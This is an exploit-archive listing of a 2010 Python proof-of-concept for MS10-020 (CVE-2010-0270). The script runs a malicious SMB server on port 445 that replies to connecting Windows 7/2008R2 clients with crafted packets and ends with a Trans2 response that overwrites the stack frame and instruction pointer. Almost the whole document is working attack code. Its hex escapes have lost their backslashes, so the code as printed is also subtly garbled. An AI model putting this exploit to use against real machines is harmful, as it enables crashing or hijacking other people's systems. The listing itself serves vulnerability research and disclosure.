Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC
# Published : 2010-04-17
# Author : Laurent Gaffie
# Previous Title : Huawei EchoLife HG520c Denial of Service and Modem Reset
# Next Title : Apple iPhone 3.1.2 (7D11) Model MB702LL Mobile Safari Denial-of-Service
import sys,SocketServer

# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html


EBP = "x42x42x42x42"
EIP = "x41x41x41x41"


packetnego = (
"x00x00x00x55"
"xffx53x4dx42x72x00x00x00x00x98x53xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxfex00x00x00x00"
"x11x05x00x03x0ax00x01x00x04x11x00x00x00x00x01x00"
"x00x00x00x00xfdxe3x00x80x1ax49xf9x22xfbx86xcax01"
"x88xffx00x10x00xf0xe4x54xc4x50x6cxb2x4axb9x3ax6b"
"xcfxb0x8cx8dxaf"
)

packetsession = (
"x00x00x01x3d"
"xffx53x4dx42x73x16x00x00xc0x98x07xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00xffxffxffxfex00x08x10x00"
"x04xffx00x3dx01x00x00xc8x00x12x01x4ex54x4cx4dx53"
"x53x50x00x02x00x00x00x0cx00x0cx00x38x00x00x00x15"
"x82x8axe2x16x7ax68x5fxc6x0cx78xd8x00x00x00x00x00"
"x00x00x00x84x00x84x00x44x00x00x00x05x01x28x0ax00"
"x00x00x0fx46x00x55x00x43x00x4bx00x55x00x32x00x02"
"x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x01"
"x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x04"
"x00x22x00x66x00x75x00x63x00x6bx00x75x00x32x00x2e"
"x00x74x00x65x00x73x00x74x00x2ex00x6cx00x6fx00x63"
"x00x61x00x6cx00x03x00x22x00x66x00x75x00x63x00x6b"
"x00x75x00x32x00x2ex00x74x00x65x00x73x00x74x00x2e"
"x00x6cx00x6fx00x63x00x61x00x6cx00x06x00x04x00x01"
"x00x00x00x07x00x08x00xe8x62xc8x16xfbx86xcax01x00"
"x00x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00"
"x73x00x20x00x35x00x2ex00x31x00x00x00x57x00x69x00"
"x6ex00x64x00x6fx00x77x00x73x00x20x00x32x00x30x00"
"x30x00x30x00x20x00x4cx00x41x00x4ex00x20x00x4dx00"
"x61x00x6ex00x61x00x67x00x65x00x72x00x00"
)

packetsession2 = (
"x00x00x00x75"
"xffx53x4dx42x73x00x00x00x00x98x07xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00xffxffxffxfex00x08x20x00"
"x04xffx00x75x00x01x00x00x00x4ax00x00x57x00x69x00"
"x6ex00x64x00x6fx00x77x00x73x00x20x00x35x00x2ex00"
"x31x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x4cx00"
"x41x00x4ex00x20x00x4dx00x61x00x6ex00x61x00x67x00"
"x65x00x72x00x00"
)

packetree = (
"x00x00x00x38"
"xffx53x4dx42x75x00x00x00x00x98x07xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x08xffxfex00x08x30x00"
"x07xffx00x38x00x01x00xffx01x00x00xffx01x00x00x07"
"x00x49x50x43x00x00x00x00"
)


packetntcreate = (
"x00x00x00x87"
"xffx53x4dx42xa2x00x00x00x00x98x07xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x08x84x08x00x08x40x00"
"x2axffx00x87x00x00x00x40x01x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x00"
"x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x02x00xffx05x00xffxa2x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x9bx01x12"
"x00x9bx01x12x00x00x00"
)

packetrans = (
"x00x00x00x5a"
"xffx53x4dx42x32x00x00x00x00x98x07xc8x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x08x30x0bx00x08x50x00"
"x0ax02x00x18x00x00x00x02x00x38x00x00x00x18x00xff"
"xffx00x00x00x00x1fx00x00x00x00x00x00x00x10x00x00"
"x41x42x43x44x45x46x47x48x49x50x51x52x53x54x55x56"
"x02x61"+EBP+EIP
)

class SMB1(SocketServer.BaseRequestHandler):
     
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)

    def handle(self):
      try:
       while True:
         print "From:", self.client_address
         data = self.request.recv(1024)

         ##Negotiate Protocol Response
         if data[8] == "x72":        
           self.request.send(packetnego)
           print "Negotiate Response sentn"

         ##Session Setup AndX Response, NTLMSSP_CHALLENGE, Error: STATUS_MORE_PROCESSING_REQUIRED
         if data[8] == "x73":     
           self.request.send(packetsession)
           print "Session Response sentn"
           #Session Setup AndX Response
           data = self.request.recv(1024)       
           if data[8] == "x73":
              self.request.send(packetsession2)
              print "Session 2 Response sentn"

         ##Tree Connect AndX Response
         if data[8] == "x75":      
           self.request.send(packetree)
           print "TREE Response sentn"

         ##NT Create AndX Response, FID: 0x4000
         if data[8] == "xa2":        
           self.request.send(packetntcreate)
           print "NT create Response sentn"

         ####Trans2 Response, QUERY_FS_INFO
         if data[8] == "x32":     
           self.request.send(packetrans)
           print "Trans2 Response sent box pwnedn"

      except Exception:
         print "oups"
         self.request.close()
         print "Disconnected from", self.client_address

SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB1)
launch.serve_forever()